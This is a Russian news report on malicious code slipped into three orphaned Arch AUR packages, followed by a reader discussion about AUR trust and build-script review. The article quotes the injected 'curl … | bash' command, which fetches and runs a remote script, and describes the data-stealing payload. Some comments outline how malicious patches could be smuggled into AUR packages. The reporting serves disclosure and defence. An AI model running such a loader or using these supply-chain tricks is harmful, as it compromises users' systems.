В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены (https://lists.archlinux.org/pipermail/aur-general/2018-July/...) три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах
acroread 9.5.5-8 (https://aur.archlinux.org/cgit/aur.git/?h=acroread) (Adobe PDF Reader), balz 1.20-3 (https://aur.archlinux.org/cgit/aur.git/?h=balz) (утилита для сжатия файлов) и minergate 8.1-2 (https://aur.archlinux.org/cgit/aur.git/?h=minergate) (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.7 июля в пакеты были внесены изменения, в результате которых
в файл PKGBUILD был добавлен (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id...) код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через вызов по таймеру в systemd (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей. Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh.Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. Проблема была выявлена в течение несколько часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям 7 июля устанавливавшим обновления вышеотмеченных пакетов рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).
URL: https://sensorstechforum.com/arch-linux-aur-repository-found.../
Новость: https://www.opennet.dev/opennews/art.shtml?num=48948
>учётная запись разработчика xeactor заблокированаКак-то нетолерантно.
Уууууу, толераст
По сути от'whitehat'ил...
А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
Это было удивление тем, что заблокировали вместо того, чтоб сказать спасибо за науку.
За какую науку? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
AUR полностью аналогичен PPA, и цели для которых он предназначен конвертация чужих пакетов и git clone со сборкой всяких патченых мез и вайнов.Просто нефиг из аура собирать системные компоненты и ставить осиротелый софт. Плюс к тому, никто тебя и не принуждает пользоваться всякими PPA/AURами.
> А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно."Я не я, и лошадь не моя!" - это в таких вот новостях.
А вот когда речь идет о количестве софта в репе, то арчеводы почему-то любят ходить гоголями и гордо кивать на АУР:
https://repology.org/statistics/total
;)
в связи с этим случаем я даже видел заявление, что AUR (Arch User Repository) никакого отношения к арчу не имеет
Фанатики, сэр.
>А вот когда речь идет о количестве софта в репе, то арчеводы почему-то любят ходить гоголями и гордо кивать на АУРОбъясняю для танкистов.
Момент первый. В АУРе примерно 25-40% поддерживаемых сборочных скриптов (PKGBUILD). С помощью этих скриптов с пол пинка создаётся пакет, который потом под контролем пакетного менеджера (а не бардак, как у адептов configure && make && make install). Сюда же стоит отметить простоту синтаксиса, и как следствие простоту поддержки PKGBUILD в актуальном состоянии. Именно поэтому они кивают на АУР.
Момент второй. АУР во многих аспектах создан по гугловому принципу "Don't be evil", который сейчас и нарушили - загрузили скрипт подтягивающий дрянь. Да в текущем виде подобных атак можно провести вагон и тележку - в постинстальные скрипты добавить патч Бармина, например. Отсюда и всякие "Any use of the provided files is at your own risk", который болдом висит на главной странице АУРа, отсюда и манёвры с Trusted Users, отсюда и голосовалка, чтобы откровенная дрянь или мало кому нужная херня не попала в community.
Момент третий. И, на мой взгляд, самый важный. В стародавние времена, люди сами просматривали PKGBUILD перед тем, как собрать его с помощью makepkg. Сейчас, с появление автоматизаторок, и в особенности yaourt, который во многих в скользких ситуациях, предлагает решения в стиле "пох*й - пляшем", этап рецензирования просто выпал.
Вот и всё - нагибание принципа "Don't be evil" и отсутствие минимальной гигиены привело к таким печальным результатам.
> С помощью этих скриптов с пол пинка создаётся пакет, который потом под контролем пакетного менеджера (а не бардак, как у адептов configure && make && make install)checkinstall? Не, не слышали!
> Да в текущем виде подобных атак можно провести вагон и тележку -
> в постинстальные скрипты добавить патч Бармина, например. Отсюда и всякие "Any
> use of the provided files is at your own risk", который
> болдом висит на главной странице АУРа, отсюда и манёвры с Trusted
> Users, отсюда и голосовалка, чтобы откровенная дрянь или мало кому нужная
> херня не попала в community.Отсюда и полная неуместность сравнения с нормальными репами того же дебиана, о чем собственно и речь.
То, что скрипт сборки умеет лазить в репозитории дебианов и федор, тягать оттуда их пакеты и конвертить в свои, это конечно фатальный недостаток, да.И то, что он из git умеет собирать бинарный пакет, - это тоже страхъ, да.
>А вот когда речь идет о количестве софта в репе, то арчеводы почему-тоВапщта в Арче пакетов много даже БЕЗ aur.
Плюс, в целом ситуация - когда обнаружили подставу всего через 7 часов показывает высокий уровень подготовки Арчеводов. :D Ты лучше убунтуям в PPA троян положи и посмотрим сколько лет он там пролежит незамеченным.
>>А вот когда речь идет о количестве софта в репе, то арчеводы почему-то
> Вапщта в Арче пакетов много даже БЕЗ aur.Вапщта нет. И количество пакетов != количество софта.
Ага. Да и количество пакетов - не самый важный показатель.
от'redhat'ил
Аргументируй
> По сути от'whitehat'ил...да, но скорее тестировали, как пройдет.
Отсюда вывод: никаких бинарных пакетов от людей не являющихся официальными разработчиками дистрибутива. Нужно что-то, чего нет в официальном репозитории, собирайте пакет сами из исходников, скачанных с официального сайта соответствующего проекта.
Мда... Я смотрю кто то не знает что такое AUR... Там нет этих ваших бинарных пакетов как в Ubuntu PPA, там только простые(за все не поручусь но офф документация рекомендует обходиться буквально в несколько строк) скрипты для сборки того или иного пакета из исходников.
> Мда... Я смотрю кто то не знает что такое AUR...И этот кто-то - ты.
> Там нет этих ваших бинарных пакетов как в Ubuntu PPA
Серьезно? А "-bin" пакеты - это что?
https://aur.archlinux.org/packages/?O=0&K=-bin
> Серьезно? А "-bin" пакеты - это что?А где лежат сами пакеты без подсказки догадаетесь?
>> Серьезно? А "-bin" пакеты - это что?
> А где лежат сами пакеты без подсказки догадаетесь?Можно раскрыть мысль - а как это отменяет факт, что бинарные пакеты в AUR таки есть, о чем и было сказано?
В аур есть бинарные пакеты, а аур нету самих бинарников. Нельзя там бинарники хостить, блин. Что-за недалёкий народ, не знают сути вопроса но спорить лезут не по делу.
> В аур есть бинарные пакеты, а аур нету самих бинарников. Нельзя там бинарники хостить, блин. Что-за недалёкий народ, не знают сути вопроса но спорить лезут не по делу.Действительно, такие как ты очень любят настойчиво не понимать, с чем идет спор и настаивать на чем-то, с чем никто не спорил.
Предыдущий оратор говорил, что в AUR все собирается из исходников и нет бинарей и спор был именно с этим. Я не утверждал, что бинари лежат прямо в AUR. Но тебе ведь наплевать. Тебе поспорить надо.
Спор какой-то не в тему. Впадлу что ли PKGBILD глянуть на предмет, от куда бинари дёргаются.
> Спор какой-то не в тему. Впадлу что ли PKGBILD глянуть на предмет, от куда бинари дёргаются.А "впaдлу" включить голову и попытаться понять, что речь идет не об этом? Или тут все уже начинают включать режим одеревенения?
Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты.
> Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты.Остаться правым можно в случае, если был какой-то спор. А когда ты говоришь про Фому, а тебе упорно в ответ талдычат про Ерёму - это не спор, а просто тупoсть. Но многих здесь это, видимо, устраивает.
Так это ещё хуже, чем если бы они там были. Тупо в любой момент можно бинарник подменить.
Серьезно что ли?
Откройте PKGBUILD, не поленитесь. Там в строчке source указано, где лежит бинарь
...и к нему контрольная сумма прилагается.Так например проприетарный торрент-клиент Tixati качается с официального сайта и конвертируется в родной пакет.
...если контрольная сумма не совпадает (программа подменена или обновлена) — сборка и установка пакета не происходит.
> ...и к нему контрольная сумма прилагается.
> ...если контрольная сумма не совпадает (программа подменена или обновлена) — сборка и установка пакета не происходит.Верно. Но кто сможет поручиться за то, что в бинарном пакете, лежащем на этом самом внешнем сайте, даже если он проходит валидацию - не запихали в одном из релизов вошек? Какой-то неизвестный Вася, собиравший PGKBUILD, тебе за это поручится?
Понятно, что это не будет проблемой AUR-а как таковой, но сам по себе AUR никто и не обвинял. Вопрос в том, что установка бинарных пакетов - есть. Со всеми из этого вытекающими потенциальными проблемами. Какой смысл с этим спорить, дескать, "а бинари не на самом AUR-е лежат!" - я фиг знает.
> Серьезно? А "-bin" пакеты - это что?Тебе ещё раз повторяют: в самом AUR'е не содержится никаких пакетов, тем более бинарных. AUR - это сборник PKGBUILD'ов, скриптов сборки пакетов. Но в AUR'е присутствуют скрипты для установки бинарников, это да.
В аур, думаю, можно коммитнуть бинарник (головой не ручаюсь, может быть у них там какие-то хуки стоят на пуш, а пробовать не приходилось) и добавить его в sources
Нельзя
Почему?
Точно можно всякие .desktop коммитить. И кажется, где-то даже видел .xpm в сорцах, что есть бинарник.
И .desktop, и .xpm — это текстовые форматы.
Так а все таки, что помешает? Запушить не позволят?Не хочу заняться аур тестовым пакетом чтоб только проверить
> Но в AUR'е присутствуют скрипты для установки бинарников, это да.Именно про это и говорилось, и ничего не говорилось про то, где бинарные пакеты расположены. Но зачем включать голову, напрягать зрение чтением, когда желание поспорить на пустом месте уже сформировалось, правда?
Ну да, они есть. Но достаточно скачать такой PKGBUILD и глянуть в нем, откуда качается бинарь, чтобы понять, стоит это ставить или нет.
> Мда... Я смотрю кто то не знает что такое AUR... Там нет этих ваших бинарных пакетов как в Ubuntu PPA, там только простые(за все не поручусь но офф документация рекомендует обходиться буквально в несколько строк) скрипты для сборки того или иного пакета из исходников.Наркоманштoле ? Каким образом ты думаешь устанавливается софт по типу вайбера ?
Нее, с официального сайта качается deb-файл, оттуда вытягивается бинарник и ставится согласно окружению.Прости что разрушил твой уютный мирок.
вот только в AUR-е от этого бинарников не появилось
> вот только в AUR-е от этого бинарников не появилосьЭто каким-то образом отменяет установку бинарника ?
С каких пор установка бинарей с оф. сайтов стала трагедией?
Этот вывод не отсюда. В данном случае хватило бы просто прочесть скрипт сборки.
> собирайте пакет сами из исходников, скачанных с официального сайта соответствующего проектаAUR это и делает. Выкачать PKGBUILD из AUR и проверить 20-строчный скрипт на предмет закладок гораздо проще, чем этот самый скрипт написать.
AUR FTW, ArchLinux one love, ну и там всякое такое...
О да, для каждого пакета просматривать скрипт установки то еще удовольствие.
Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый скрипт сборки.
> Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый
> скрипт сборки.кстати а при обновлении из AURа пакетный манагер обновляет или говорит что низя и надо смотреть?
Смотря какой манагер. yaourt обновляет, но отдельно от бинарных реп, и предлагает каждый pkgbuild посмотреть.
Более того, он может обновлять через git и предлагать проверить не весь PKGBUILD, а только изменения в нем.
на всякий случай про текущую ситуацию с yaourt: https://www.reddit.com/r/archlinux/comments/8wp9ep/psa_that_.../
Сейчас в моде aurman. Держу в курсе.
при каждой установке или обновлении пакета предлагает посмотреть
> при каждой установке или обновлении пакета предлагает посмотретьа много можно понять по такому билдскрипту?
https://www.opennet.dev/openforum/vsluhforumID3/114809.html#48
Увы, но что-то я там не увидел билдскрипта.
> Увы, но что-то я там не увидел билдскрипта.а что же там? "Kусок из PKGBUILD chromium-dev"
В скрипте не видно,что он создает в usr/lib/systemd/system что-то
Как это?!..
/usr/lib/systemd/systemd.so ? :-)
ну, учитывая что в аур даже варез заливают, заголовок желтоват. "Доверяй, но проверяй"
мне видится 1 потенциально удачный сценарий атаки на AUR — сделать вредоносный патч на сишечке, а лучше перле к какому-нибудь сложному софту (чтоб нелегко было разобраться) с аргументацией, что патч что-то улучшает (Arch позволяет делать патчи частью пакета). Лучше если будет много патчей, да чтоб часть из них правда делала что-то полезное, а без некоторых сборка на арче была невозможна.Тогда — высока вероятность, что вредоносный патч заметят очень не сразу.
И что это за мегапопулярный пакет будет, что кто-то будет этим заморачиваться?
Навскидку - гуглохром подойдёт. Особенно пикантно, если патчи будут чистить гуглозонды. Параноики же должны страдать, правда?
Вряд ли к таким пакетам проходимец какой-нибудь дорвется.
К основному Хрому да.
А к какой-нибудь патченной в ауре, которая типа буз гуглозондов (вообще, есть хромиум, но, с другой стороны, хром не только зондами отличется, но это так, лирика).
Концепция видится мне рабочей, не обяхательно хром, пример не слишком удачный.
Но много народу не заразить таким образом, наверное.
Куча народа мониторят изменения в PKGBUILD в таких популярных пакетах.
> Куча народа мониторят изменения в PKGBUILD в таких популярных пакетах.Вопрос в том, мониторят ли так же и все сторонние патчи?
Kусок из PKGBUILD chromium-dev:
source=( #"https://gsdview.appspot.com/chromium-browser-official/chromium-${pkgver}.tar.xz"
"https://commondatastorage.googleapis.com/chromium-browser-of...-${pkgver}.tar.xz"
'git+https://github.com/foutrelis/chromium-launcher.git'
'chromium-dev.svg'
# Patch form Gentoo
'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
# Misc Patches
'chromium-ffmpeg-clang.patch'
'chromium-intel-vaapi_r18.diff.base64::https://chromium-review.googlesource.com/changes/532294/revi...'
# Patch from crbug (chromium bugtracker) or Arch chromium package
'chromium-widevine-r2.patch::https://git.archlinux.org/svntogit/packages.git/plain/trunk/...'
'chromium-skia-harmony.patch::https://git.archlinux.org/svntogit/packages.git/plain/trunk/...'
'fix_mixup_between_DIP_pixel_coordinates.diff.base64::https://chromium-review.googlesource.com/changes/1083692/rev...'
)
Т.е, если развить идею - делаем работающий патч для вырезания очередного зонда или сомнительного действа.
Прилежно сопровождаем пару месяцев, предлагаем для включения.
...
Через тройку месяцев подменяем.
...
Профит!?Немного утрированно, но кроме популярных хрумов наверняка наберется дюжина-другая "малонужных" (и поэтому слабомониторящихся) проектов, с неплохой суммарной пользовательской базой.
там у каждого файла по рекомендациям должна быть хеш, если изменить файлы то хеш не сойдется, но в принципе я думаю никто не следит за тем что хеши обновляются
> там у каждого файла по рекомендациям должна быть хеш, если изменить файлы
> то хеш не сойдется, но в принципе я думаю никто не
> следит за тем что хеши обновляютсяблин, это ж естественно, что хеши обновляются. Код меняется, патчи адаптируются под новый код.
Тут все только не доверии. Кажется, кстати, можно пакеты в AUR подписывать gpg ключом (не уверен, но вроде бы встречалось такое).
> Кажется, кстати, можно пакеты в AUR подписывать gpg ключома смыл-то в чем? Вот подпишу я тебе своим ключом пакет, создающий у тебя в хомяке pwned.txt - у меня тех ключей - целая ключница. И чо?
в нормальных репо это ключ команды или компании, владельца дистрибутива - и предполагается, что они хоть немного проверяют, что именно им подписывают (блаженн кто верует).
А тут фейс-контроля нет.
В смысле, Хромиум? А то к Хрому сишные патчи не применишь.
Только Gentoo!
Иногда нужно работать а не компилировать
Можно make -j1 в фоне в /tmp. Если в /tmp места нет, то BFQ. Но опять же приходится доверять тому, что в оверлеях.
Вот реально в фоне бывает крутится сборка какого-то крупного обновления. Из неудобств, повышенный нагрев ноутбука небольшой и немного подёргивается Youtube иногда. При этом IDE работает нормально, gulp работает нормально, веб-сервер с PHP и MySQL работает приемлемо. Можно даже под Android проект собирать. А вот когда Windows начинает что-то ставить, хоть вешайся. Такое чувство, что она обновления из исходников собирает. При этом проблемы бывают даже с перемещением курсора. А самое главное, можно запускать сборку обновлений в тот момент, когда тебе особо компьютер не нужен, а вот Windows может это сделать тогда, когда вздумает нужным или вообще поставит перед фактом, мол давай-ка перезагрузимся, после чего пол часа висит на установке обновлений и вообще ничего делать не даёт. Особенно радует, когда играешь в танки и тут срочно что-то надо сделать. Закрываешь танки и пытаешься загрузить Linux. Но нет, Windows нужно установить обновления. Я однажды не выдержал и перезагрузился жёстко. Поработал, а обратно в Windows попасть уже не смог, пришлось переустанавливать.
На свалке нашли мусор, вот так новость.
Новость наверно в том, что раньше не находили.
Это немного удивительно.
> Новость наверно в том, что раньше не находили.
> Это немного удивительно.удивительно, что никто не хотел рыться в свалке, чтобы убедиться ? ;-)
Ну вот, нашлись какие-то бомжи, может рассчитывали озолотиться на сдаче во вторсырье.
Так, может, там такого добра ещё много. Но только один чел взял и намеренно создал файлик ваш.archlinux.скомпрометирован.txt, так что не заметить было просто нельзя.
Эта новость, наверное, больше удивила тех, кто с миром Arch не знаком (в частности, меня): оказывается, у них там принято копаться по помойкам!
Почалось! Я давно уже ждал когда начнется распространение заразы со всяких ppa помоек, по которым любят шарится фанаты пакетных дистров. Давно пора.
А типа в ядро или другой проект не может попасть вредоносный код. Мэйнтейнеры только код от новичков отфутболивают. Так что достаточно попасть на ПК не новичка или его учётку, чтобы увеличить шансы прохождения.
Достаточно не новичку захотеть реальных денег за свои труды. Что такое доверие, если ты не знаешь всех этих людей и ответственности у них нет кроме позора в маргинальной среде и удаления учетки?
Пока выходят программы, которых нет ни в дистрах, ни в официальных репах разработчика весь этот бред и будет твоирться. Софт можно найти только в ненадежных источниках. Какая туту безопасность?
https://www.opennet.dev/opennews/art.shtml?num=24610 - я просто оставлю это здесь.
Так AUR помойка, зато в ней есть практически всё.
Мое любимое место, столько хaлявной тухлятинки, мммм... обожаю. ;)
Тухлятинка обычно не собирается.
Если ты хочешь из аура mesa-git собрать, то сначала надо подключить неофициальную репу llvm-svnТам такая логика, что без одного ты не соберёшь другое, а собирать всё из сорцов — жизни не хватит чтоб разобраться с еггогами.
Забавные они там все.
Вот просто так валяется хлам и каждый может ещё сверху нагадить.
Не у всех видимо есть ресурсы на создание чего-то по типу Suse build service.
так вроде сузя его уже тоже - тогось, остался урезанный и с фейс-контролем на входе (что с одной стороны - как-то и уменьшает количество троянов, а с другой - сводит и количество полезных пакетов к околонулю)
Вроде, нет. Любой желающий может собирать пакеты, как и раньше.
аааааяяя говорииииииил!!!!линукс надо защищать по дефолту и юзера от программ и программы от программ
в винде в силу контингента иди^W пользователей оной с этим сейчас лучше чем в линуксе
В виндоувсе со многими аспектами лучше, чем в линуксе.
с троянами и майнингом например
в windows store - пока не замечено ни того, ни другого.В том числе да, и потому, что надо заплатить денег за сертификат. Пусть копеечных.
> в windows store - пока не замечено ни того, ни другого.так там и софта не замечено
патамуштанадазаплатитьзасертификат, ага. Ну то есть - помоечного софта незамечено, а непомоечного - так его и в гуглоплее днем с фонарем (и не вздумайте тот фонарь что первым нашелся поиском, и вторым, и третьим, где-то с пятнадцатого начинаются работающие, без требований доступа к sms и телефонной книжке)а казалось бы - бери и эксплойть миллионы виндохомячков (думаю, их все еще даже больше, чем владельцев андроедов, молчу уж про какой-то там рач и его полтора юзера, да еще и тянущих что попало с aur). Но нет, копеечная преграда - и никого на горизонте.
P.S. месяц назад был изумлен, обнаружив там UBO. В общих чертах - вполне работающий. Казалось бы, где имение, а где вода?
В маке как то решают, все живы. Там сертификат подписи с оперативным отзывом со стороны apple и ревью приложения перед публикацией.
> В маке как то решают, все живыНе все. Многие от туда просто свалили. И распространяют свой софт не через AppStore, а по принципу "скачать dmg с нашего сайта"
Свалили таки по другой причине. Любой софт из стора работает в песочнице(по моему в windows теперь так же), не всех разработчиков это устраивает по разным причинам.
На моей памяти совсем без сертификата был только transmission. ПО в пакетах pkg отдельная песня, не всем оно нужно и обычно есть альтернативные пути.
> В маке как то решают, все живы.идея та же что у MS, но уже не годится первый попавшийся code signing сертификат за любые три копейки - нужен специальный, одобренный эплом, пачку себе понавыписать и менять раз в день не получится. После этого изволь свой проект на блюдечке представить к рассмотрению - что тоже само-то по себе не панацея, но еще одна преграда, требующая времени и деньжат. А мы ж хотим побыстрому нагадить/стырить что-нибудь и смыться, нам некогда - поэтому мы пойдем туда, где не надо ни денег платить, ни фейсконтроль проходить.
Ну, соответственно, софта тоже сильно поменьше чем для ведроида, и особенно - софта помоешного. Сильно побольше чем у винды, но это в основном потому, что поляну успели застолбить гораздо раньше. Худо-бедно какая-то кормовая база для его писателей успела нарости.
> Ну то есть - помоечного софта незамеченоПлохо смотрел. Этак в годах 2013-2014 я как-то туда лазил. Там жуть была.
Потом правда занялись, и исправили это безобразие.https://www.instagram.com/p/svMZwyI66q/
Без нормальной модерации другого не дано.
> В виндоувсе со многими аспектами лучше, чем в линуксе.В смысле -- вместо долгих «нескольких часов», всего за какой-то жалкий месяц обнаружили, что кто-то хакнул CCleaner, не поленившись до кучи еще и стырить ключ для подписи setup.exe и успел заразить пару миллионов пользователей?
https://thehackernews.com/2017/09/ccleaner-hacked-malware.html
вот и не ставь всякой фигни с васян-сайтов, и под виндой тоже не.
Хакнули-то cdn avast, а не microsoft store.
Внезапно, в AUR'е и гентушных оверлеях можно хоть скрипт сборочный почитать, что он делает. В отличие от PPA и всяких васянских помоек с уже собранными бинарниками, которыми так любят обмазыватся убунтуи и редхатоиды.
ты не поверишь, в большинстве этих помоек есть source repo. Но из него никто никогда не ставит, как и рачеводы никогда не читают свои сборочные скрипты, а гентушники все ждут и ждут ебилдов, не умея написать свой.Пока кто-то добрый не создаст им прямо в хомяке файл с именем PWNED!!! , тогда, может быть, замечают что что-то не так.
разумеется, есть редкие исключения, но они тоже есть везде.
> рачеводы никогда не читают свои сборочные скриптыЯ читаю
>ты не поверишь, в большинстве этих помоек есть source repo.В больших, типа epel'я есть, а в мелких, на пять-десять пакетов пару раз только видел, и то оне были копроративные, а васяны подобными тонкими материями не заморачиваются.
>рачеводы никогда не читают свои сборочные скрипты, а гентушники все ждут и ждут ебилдов, не умея написать свой.
Я и ебилд могу написать, и deb/rpm пакет собрать, но зачем, если кто-то уже сделал? Тот, кто этим пакетом давно занимается, по-любому лучше меня знает всякие нюансы, из-за которых пакет может не собраться или собраться с косяками. А еще его поддерживать надо, апдейтить и с другими пакетами стыковать.
а при чем тут source repo? пакет (как минимум deb, за rpm не ручаюсь) - это архив, который можно распаковать, а в нем и находятся скрипты, которые выполняются во время установки или удаления пакета (preinst, postinst, prerm, postrm) их можно посмотреть перед установкой.
в добавок apt перед установкой какого-нибудь пакета сразу говорит что собирается ставить и ожидает подтверждения. Список этот можно сохранить, вместо install выполнить download (чтобы загрузить пакеты без установки), и дальше архиватором пройтись по загруженным архивам на поиск трояна.
Да, долго, да неудобно, но возможно же.
На сколько пакетов тебя хватит?
Ну почитал и что. То же что и на бинарник поглядеть. Читатели блин.
Эка невидаль. А PKGBUILD на что yaourt каждый раз заботливо предлагает читать? Большинство из них очень простенькие. Есть пакеты с патчсетами, где диффы прямо с пакетом идут, но их мало и патчи как правило тоже маленькие. Для важных мне пакетов я не ленюсь каждый раз просматривать PKGBUILD, ну и изучать остальные задействованные при сборке файлы, если они вызывают пусть и слабые, но подозрения. Зная как работает AUR, нужно просто им правильно пользоваться. А от бяки никто не застрахован. Вот недавно в snap-пакетах майнеры находили. Не удивлюсь, если и в пакетах какого-то не очень популярного дистра(или хотя-бы в ppa популярного) найдут подобные "подарки". А пацику, что отвайтхейтил неосторожных пользователей AUR спасибо сказать нужно - он ничем деструктивным не побаловался на их тачках, и при этом преподал им ценный урок. Будут читать PKGBUILD-ы теперь.
> А PKGBUILD на что yaourt каждый раз заботливо предлагает читатьЕсть, правда, еще pacaur, который, если не ошибаюсь, молча качает и ставит.
> Для важных мне пакетов я не ленюсь каждый раз просматривать PKGBUILDа не важные для вас пакеты значит хомяк не овнят?
с остальным согласенпросто не метод всё глазами и руками делать, так можно дойти до самостоятельного написания нужных лично программ
тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных данных вместо реальных и тд
> просто не метод всё глазами и руками делать, так можно дойти до
> самостоятельного написания нужных лично программ
> тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных
> данных вместо реальных и тдСогласен, только пока ничего подобного не видел. И не факт что кто-то вообще возьмётся подобное пилить. Больше надежды что кто-то допилит песочницу для flatpack, и отсутствующее в репах ПО будут ставить из хаба с пакетами flatpack.
Как-то не удивляет и не пугает такое. AUR в Арче, юзерские PPA в Убунту, репы home:user в Сусе — это всегда неизвестно что и на свой страх и риск.
большинство пипла, судя по комментам, не в курсе с чем едят aur, а с чем нет, но, чсх, мнение имеют.
> В данные пакеты был добавлен код для загрузки и запуска скрипта...Типичный линуксоидно-школотронский стиль - засунем в билды всяких примочек, скриптов, картинок! Пусть дыры зияют, главное - можно запускать свои идиотские скрипты. Хотя казалось бы, это СБОРКА - пиши программу так, чтобы в ней не приходилось ничего "шаманить" со средой, файлами и т.п. Просто скомпили *.c - чего тебе ещё надо??
Внизaпна, унутре твоих любимых .exe тоже есть скрипты, но тебе их не покажут, чтоб не травмировать нежную хипсторскую психику.
вот тебе, например, рабочих мозгов надо.
Та норм тема аур. Все кто его хейтят просто завидуют, что в их дистре нет подобной штуки. Понятно дело во всем есть свои минусы и плюсы, но плюсы аура перевешивают минусы. От установки говна никакая ос не застрахована.
> Все кто его хейтят просто завидуют,Перевод с арчеводного на русский:
"хейтить" - не любить, не восторгаться, непочтительно и неуважительно отзываться о проекте
Т.е. на самом деле все, кто не пользуется аркой - люто завидуют!
Все завидуют,ага.
Особенно bsdишники и гентушники ХD
> В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.comПроделки космонафта. Хочет сравнить с результаты с бубунтой.
плюсадын (выпиливает apport - еще один троянец, помимо "contest"а)
>В AUR-репозитории Arch Linux найдено вредоносное ПОА сколько ещё не выявлено.)
Зато модно стильно и молодёжно.